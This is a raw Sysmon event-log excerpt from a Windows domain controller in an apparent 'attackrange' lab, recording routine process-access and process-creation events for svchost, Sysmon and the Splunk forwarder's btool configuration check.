13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007208Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007207Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007206Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007205Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85E9-5FCF-2701-000000009101}4792C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007204Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007203Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-85E9-5FCF-2601-000000009101}42604904C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{10ACEC4A-85E9-5FCF-2701-000000009101}4792C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007202Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.600{10ACEC4A-85E9-5FCF-2701-000000009101}4792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85E9-5FCF-2601-000000009101}4260C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000007201Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85E9-5FCF-2601-000000009101}4260C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007200Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007199Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007198Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007197Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007196Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007195Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007194Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007193Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007192Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85E9-5FCF-2601-000000009101}4260C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007191Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007190Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-85E9-5FCF-2501-000000009101}42445096C:\Windows\system32\cmd.exe{10ACEC4A-85E9-5FCF-2601-000000009101}4260C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007189Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.594{10ACEC4A-85E9-5FCF-2601-000000009101}4260C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-85E9-5FCF-2501-000000009101}4244C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000007188Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85E9-5FCF-2501-000000009101}4244C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007187Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007186Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007185Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007184Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007183Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.589{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007182Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 